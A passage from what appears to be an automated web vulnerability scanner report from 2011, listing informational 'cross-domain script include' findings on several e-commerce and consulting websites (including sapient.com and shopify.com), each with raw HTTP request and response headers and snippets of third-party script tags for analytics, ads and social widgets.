<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
<link rel="stylesheet" href="http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_enterprise.css" type="text/css" />


<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/scripts/jw_scripts.js"></script>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/readwrite'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://disqus.com/forums/readwriteenterprise/embed.js"></script>
...[SNIP]...
<div class="channel-sponsor-logo" style="margin-bottom: 15px">
<script type="text/javascript" src="http://static.fmpub.net/zone/4478"></script>
...[SNIP]...
<!-- FM Custom MREC 1 - RWW Enterprise Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/4445'></script>
...[SNIP]...
</ul>
<script type="text/javascript"
src="http://twitter.com/javascripts/blogger.js">
</script>
<script type="text/javascript"
src="http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json?callback=twitterCallback2&amp;count=3">
</script>
...[SNIP]...
<!-- FM Custom MREC 2 - RWW Enterprise Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/4479'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://readwriteenterprise.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=people&excerpt_length=200"></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=readwriteweb"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...

20.311. http://www.resourcepoint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.1.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 11:14:04 GMT
Accept-Ranges: bytes
ETag: "0a61544d20cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:35:41 GMT
Content-Length: 63953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point . Experts in eCommerce, portal development & content management</title>
<meta http-equiv="Conten
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...

20.312. http://www.resourcepoint.net/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /index.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 11:14:04 GMT
Accept-Ranges: bytes
ETag: "0a61544d20cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:14 GMT
Content-Length: 63953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point . Experts in eCommerce, portal development & content management</title>
<meta http-equiv="Conten
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...

20.313. http://www.sapient.com/en-us/about-sapient/alliances.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/about-sapient/alliances.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/about-sapient/alliances.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html?search=xss%20contact%20faq%20phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.4.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<!-- placeholder for google analytics and bt scripts -->
<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&amp;site=SAPIENT"></script>
...[SNIP]...

20.314. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/about-sapient/alliances/atg.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/about-sapient/alliances/atg.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:32:31 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<!-- placeholder for google analytics and bt scripts -->
<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&amp;site=SAPIENT"></script>
...[SNIP]...

20.315. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/about-sapient/corporate-social-responsibility.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/about-sapient/corporate-social-responsibility.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/alliances/atg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; locale=en-us; rootItemAlias=SapientNitro; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.1.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; sifrFetch=true

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:35:32 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<!-- placeholder for google analytics and bt scripts -->
<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&amp;site=SAPIENT"></script>
...[SNIP]...

20.316. http://www.sapient.com/en-us/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/search.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/search.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.2.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:09 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<!-- placeholder for google analytics and bt scripts -->
<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&amp;site=SAPIENT"></script>
...[SNIP]...

20.317. http://www.shopify.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "30c5dcee90df3e2bd9e086c8942ae167"
X-Rack-Cache: miss, store
X-Content-Digest: 070a65f2e8b29b4bcab54cdf40a2829e64cb6f67
X-Runtime: 1231
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 16931
Date: Tue, 06 Sep 2011 15:32:05 GMT
X-Varnish: 1687907058 1687907055
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<meta
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- wrapper -->


<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.318. http://www.shopify.com/admin/auth/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /admin/auth/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /admin/auth/login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; olarkld=1315341237560; _oklv=1315341659210; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.11.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _s=08DB14DB-F588-4766-8659; __ar_v4=RFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Rack-Cache: fresh
X-Content-Digest: 38f4c37fa64459e11e554308ab3dd1ee00e72542
X-Runtime: 1645
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
X-Cacheable: NO:Not Cacheable
Content-Length: 15660
Date: Tue, 06 Sep 2011 15:41:17 GMT
X-Varnish: 1687908019
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>


<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.319. http://www.shopify.com/examples

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /examples

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /examples HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; __ar_v4=%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A1%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.5.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _s=08DB14DB-F588-4766-8659; olarkld=1315341237560; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; _oklv=1315341238987; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "8f7c88edfb0c914b89bc76b6acab2982"
X-Rack-Cache: fresh
X-Content-Digest: b07dc9d86ea310a157a069084b0cda714abd7659
X-Runtime: 2553
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 19311
Date: Tue, 06 Sep 2011 15:34:06 GMT
X-Varnish: 1687907293 1687907271
Age: 12
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>


<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.320. http://www.shopify.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.8.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; olarkld=1315341237560; _oklv=1315341242826; _s=08DB14DB-F588-4766-8659; __ar_v4=EBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7CRFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "5e6cd1cceddc58f0b1054bb20da87a2e"
X-Rack-Cache: fresh
X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee
X-Runtime: 1746
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 15228
Date: Tue, 06 Sep 2011 15:40:58 GMT
X-Varnish: 1482397443 1482397441
Age: 108
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>


<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.321. http://www.shopify.com/tour

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /tour

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tour HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.2.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _y=76726C16-B1FA-490A-93B3; _s=08DB14DB-F588-4766-8659; __ar_v4=%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A1%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "16ce554bcc0e560a6719831237efac75"
X-Rack-Cache: fresh
X-Content-Digest: f28972877127f1924c2d86adc520840168285bb1
X-Runtime: 4033
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 24792
Date: Tue, 06 Sep 2011 15:33:55 GMT
X-Varnish: 1482396697 1482396684
Age: 150
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>


<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.322. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Success-Stories/Automated-Website-Testing.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Success-Stories/Automated-Website-Testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Success-Stories/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.20.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A31%3A22

Response

HTTP/1.1 200 OK
Content-Length: 9759
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:55 GMT
Accept-Ranges: bytes
ETag: "0bf755a144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=bdantz"></script>
...[SNIP]...

20.323. http://www.tenzing.com/atg-ecommerce-hosting.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /atg-ecommerce-hosting.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
